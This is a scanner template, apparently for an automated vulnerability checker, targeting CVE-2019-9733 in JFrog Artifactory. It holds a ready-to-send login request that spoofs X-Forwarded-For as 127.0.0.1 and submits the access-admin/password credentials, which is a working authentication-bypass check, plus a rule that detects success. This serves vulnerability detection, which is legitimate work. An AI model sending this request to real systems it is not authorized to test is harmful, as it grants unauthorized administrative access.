id: CVE-2019-9733 info: name: Artifactory Improper Authorization risk: Critical params: - root: '{{.BaseURL}}' variables: - endpoint: | artifactory/ui/auth/login requests: - method: GET url: >- {{.root}}/{{.endpoint}}?_spring_security_remember_me=false headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - X-Requested-With: artUI - serial: 58 - X-Forwarded-For: 127.0.0.1 - Request-Agent: artifactoryUI - Content-Type: application/json - Origin: http://{{.Host}} - Referer: http://{{.Host}}/artifactory/webapp/ - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close body: | {"user":"access-admin","password":"password","type":"login"} detections: - >- StatusCode() == 200 && RegexSearch("resBody", '"username": "access-admin"') references: - https://www.cvebase.com/cve/2019/9733